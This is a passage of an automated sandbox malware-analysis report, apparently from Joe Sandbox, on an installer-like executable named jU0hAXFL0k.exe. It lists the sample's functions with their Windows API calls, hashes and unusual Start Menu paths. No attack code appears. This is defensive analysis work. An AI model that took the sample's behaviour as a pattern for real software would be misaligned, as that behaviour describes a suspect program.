                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                                                                        • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                                                                                        • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                                                                        • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004056BC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShellExecuteExA.SHELL32(?,004044AF,?), ref: 004056CB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExecuteShell
                                                                                        • String ID:
                                                                                        • API String ID: 587946157-0
                                                                                        • Opcode ID: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
                                                                                        • Instruction ID: 740202cceb9cd72bfbe3504c5fe3e084c22a481b72cb9b9ac8673d70f1f22f9b
                                                                                        • Opcode Fuzzy Hash: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
                                                                                        • Instruction Fuzzy Hash: 45C092B2404200DFE301CF90CB58F077BE8AB55306F028054E1849A2A0C378A800CB7A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040408A Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00403E66), ref: 00404094
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallbackDispatcherUser
                                                                                        • String ID:
                                                                                        • API String ID: 2492992576-0
                                                                                        • Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                                                                        • Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
                                                                                        • Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                                                                        • Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 6FE91215 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNELBASE(?,6FE91233,?,6FE912CF,-6FE9404B,6FE911AB,-000000A0), ref: 6FE9121D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocGlobal
                                                                                        • String ID:
                                                                                        • API String ID: 3761449716-0
                                                                                        • Opcode ID: a07738ff40be5644d9217f29b6564a36b6ed8259a155f33307c19528ab4ac649
                                                                                        • Instruction ID: dce5a29286c7a9513d32bd255b0941f647a354b14865d914297dee5144301a3e
                                                                                        • Opcode Fuzzy Hash: a07738ff40be5644d9217f29b6564a36b6ed8259a155f33307c19528ab4ac649
                                                                                        • Instruction Fuzzy Hash: 30A00175944900DADE519AE1891AA183E26A74B721F008042E32954194866640209B36
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 004044FA Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404549
                                                                                        • SetWindowTextA.USER32(00000000,?), ref: 00404573
                                                                                        • SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 00404624
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0040462F
                                                                                        • lstrcmpiA.KERNEL32(Call,Trochidae Setup: Installing), ref: 00404661
                                                                                        • lstrcatA.KERNEL32(?,Call), ref: 0040466D
                                                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040467F
                                                                                          • Part of subcall function 004056DA: GetDlgItemTextA.USER32(?,?,00000400,004046B6), ref: 004056ED
                                                                                          • Part of subcall function 00406244: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\jU0hAXFL0k.exe",76403410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 0040629C
                                                                                          • Part of subcall function 00406244: CharNextA.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004062A9
                                                                                          • Part of subcall function 00406244: CharNextA.USER32(?,"C:\Users\user\Desktop\jU0hAXFL0k.exe",76403410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 004062AE
                                                                                          • Part of subcall function 00406244: CharPrevA.USER32(?,?,76403410,C:\Users\user\AppData\Local\Temp\,00000000,00403210,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,?,0000000A), ref: 004062BE
                                                                                        • GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,?,0041ECD8,?,?,000003FB,?), ref: 0040473D
                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404758
                                                                                          • Part of subcall function 004048B1: lstrlenA.KERNEL32(Trochidae Setup: Installing,Trochidae Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,004047CC,000000DF,00000000,00000400,?), ref: 0040494F
                                                                                          • Part of subcall function 004048B1: wsprintfA.USER32 ref: 00404957
                                                                                          • Part of subcall function 004048B1: SetDlgItemTextA.USER32(?,Trochidae Setup: Installing), ref: 0040496A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$Call$Trochidae Setup: Installing
                                                                                        • API String ID: 2624150263-3291086599
                                                                                        • Opcode ID: 0f165c49e2d917f5e6a894268aac4f35a0a20fd2ca942178d6907e18a15d5205
                                                                                        • Instruction ID: a574bab901635a86c0a25b0ea1efcbf713871747dcedb108b051a9d89a4042ab
                                                                                        • Opcode Fuzzy Hash: 0f165c49e2d917f5e6a894268aac4f35a0a20fd2ca942178d6907e18a15d5205
                                                                                        • Instruction Fuzzy Hash: E9A16FB1900219ABDB11EFA5CD41AAFB7B8EF85315F10843BF601B62D1D77C8A418F69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 6FE91A98 Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 6FE91215: GlobalAlloc.KERNELBASE(?,6FE91233,?,6FE912CF,-6FE9404B,6FE911AB,-000000A0), ref: 6FE9121D
                                                                                        • GlobalAlloc.KERNEL32(?,000014A4), ref: 6FE91BC4
                                                                                        • lstrcpyA.KERNEL32(00000008,?), ref: 6FE91C0C
                                                                                        • lstrcpyA.KERNEL32(00000408,?), ref: 6FE91C16
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE91C29
                                                                                        • GlobalFree.KERNEL32(?), ref: 6FE91D09
                                                                                        • GlobalFree.KERNEL32(?), ref: 6FE91D0E
                                                                                        • GlobalFree.KERNEL32(?), ref: 6FE91D13
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 6FE91EFA
                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 6FE92098
                                                                                        • GetModuleHandleA.KERNEL32(00000008), ref: 6FE92114
                                                                                        • LoadLibraryA.KERNEL32(00000008), ref: 6FE92125
                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 6FE9217E
                                                                                        • lstrlenA.KERNEL32(00000408), ref: 6FE92198
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064096219997.000000006FE91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FE90000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064096174223.000000006FE90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096271269.000000006FE93000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064096311549.000000006FE95000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_6fe90000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 245916457-0
                                                                                        • Opcode ID: bb8e574eb09801df88e212c2df7b30e0db8830663a75991878a180670a235e01
                                                                                        • Instruction ID: e3192483dd78b351b21961bd99a87f096a64552915032e5a32ee6d69093c402f
                                                                                        • Opcode Fuzzy Hash: bb8e574eb09801df88e212c2df7b30e0db8830663a75991878a180670a235e01
                                                                                        • Instruction Fuzzy Hash: D2229B71944249DEDB14CFF889807EDBFF9BF06319F30462ED1A5A6280D7786982CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402138 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(00407410,?,?,00407400,?,?,00000045,000000CD,00000002,000000DF,?), ref: 004021BA
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00407400,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402269
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers, xrefs: 004021FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                                        • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers
                                                                                        • API String ID: 123533781-720141496
                                                                                        • Opcode ID: a1dc9ec723c92e273fb39141de77dbeadb3bb7973032d6efa9664245b2eac94e
                                                                                        • Instruction ID: 364dec1ee03e4b34996bd20462589a1769652030a90c2beac7f749610b7a86d9
                                                                                        • Opcode Fuzzy Hash: a1dc9ec723c92e273fb39141de77dbeadb3bb7973032d6efa9664245b2eac94e
                                                                                        • Instruction Fuzzy Hash: 30511871E00209AFCB00DFE4C988A9D7BB5FF48314F2085AAF515EB2D1DB799941CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402765 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402774
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst
                                                                                        • String ID:
                                                                                        • API String ID: 1974802433-0
                                                                                        • Opcode ID: c09b4fc7a6f55baf3cf17a5794734188267127eb7d5610de55786ce7ab9932c1
                                                                                        • Instruction ID: 2655497eb84a062ae037f6c25fa5e5de2408fe63ae01e39025771dd9bbe68540
                                                                                        • Opcode Fuzzy Hash: c09b4fc7a6f55baf3cf17a5794734188267127eb7d5610de55786ce7ab9932c1
                                                                                        • Instruction Fuzzy Hash: 3BF0A0B2644101AAD701EBB49A49AEEB768EB11324F60417BE241F21C1D2BC89459B6E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404A6D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404A84
                                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404A91
                                                                                        • GlobalAlloc.KERNEL32(?,?), ref: 00404AE0
                                                                                        • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404AF7
                                                                                        • SetWindowLongA.USER32(?,?,00405075), ref: 00404B11
                                                                                        • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404B23
                                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404B37
                                                                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404B4D
                                                                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B59
                                                                                        • SendMessageA.USER32(?,0000111B,?,00000000), ref: 00404B69
                                                                                        • DeleteObject.GDI32(00000110), ref: 00404B6E
                                                                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B99
                                                                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404BA5
                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C3F
                                                                                        • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404C6F
                                                                                          • Part of subcall function 0040409D: SendMessageA.USER32(?,?,?,00403ECD), ref: 004040AB
                                                                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C83
                                                                                        • GetWindowLongA.USER32(?,?), ref: 00404CB1
                                                                                        • SetWindowLongA.USER32(?,?,00000000), ref: 00404CBF
                                                                                        • ShowWindow.USER32(?,00000005), ref: 00404CCF
                                                                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404DCA
                                                                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404E2F
                                                                                        • SendMessageA.USER32(?,?,00000000,00000000), ref: 00404E44
                                                                                        • SendMessageA.USER32(?,00000420,00000000,?), ref: 00404E68
                                                                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E88
                                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00404E9D
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00404EAD
                                                                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404F26
                                                                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00404FCF
                                                                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FDE
                                                                                        • InvalidateRect.USER32(?,00000000,?), ref: 00404FFE
                                                                                        • ShowWindow.USER32(?,00000000), ref: 0040504C
                                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405057
                                                                                        • ShowWindow.USER32(00000000), ref: 0040505E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                        • String ID: $M$N
                                                                                        • API String ID: 2564846305-813528018
                                                                                        • Opcode ID: 6c91a6865aeac2cc1bc81da0427ec232e576c845fbda25fe1dd31a6c378936cd
                                                                                        • Instruction ID: 966653e8360bab3e2fc21879108ab338c3bc3285e0cd99f232f5bc98bb3d6c0f
                                                                                        • Opcode Fuzzy Hash: 6c91a6865aeac2cc1bc81da0427ec232e576c845fbda25fe1dd31a6c378936cd
                                                                                        • Instruction Fuzzy Hash: 86025CB0900209AFDB10DF64DC45AAE7BB9FB84314F10813AFA15BA2E0D7799E41DF58
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004041D3 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 0040425E
                                                                                        • GetDlgItem.USER32(00000000,000003E8), ref: 00404272
                                                                                        • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 00404290
                                                                                        • GetSysColor.USER32(?), ref: 004042A1
                                                                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004042B0
                                                                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004042BF
                                                                                        • lstrlenA.KERNEL32(?), ref: 004042C2
                                                                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042D1
                                                                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042E6
                                                                                        • GetDlgItem.USER32(?,0000040A), ref: 00404348
                                                                                        • SendMessageA.USER32(00000000), ref: 0040434B
                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404376
                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004043B6
                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 004043C5
                                                                                        • SetCursor.USER32(00000000), ref: 004043CE
                                                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004043E4
                                                                                        • SetCursor.USER32(00000000), ref: 004043E7
                                                                                        • SendMessageA.USER32(00000111,?,00000000), ref: 00404413
                                                                                        • SendMessageA.USER32(?,00000000,00000000), ref: 00404427
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                        • String ID: Call$N
                                                                                        • API String ID: 3103080414-3438112850
                                                                                        • Opcode ID: aedf8a6b2f60594d9aa2a20867b53785746c99fe12f07fbfb1ee765dbd043f7e
                                                                                        • Instruction ID: a86fe1b261e308fa50e110e5a31abfd90c360c5de8850f7aae14d0f145b03158
                                                                                        • Opcode Fuzzy Hash: aedf8a6b2f60594d9aa2a20867b53785746c99fe12f07fbfb1ee765dbd043f7e
                                                                                        • Instruction Fuzzy Hash: 1561A0B1A00209BBEB109F61DD45F6A7B69FB84705F008036FB01BA2D1C7B8A951CB99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                        • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                        • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
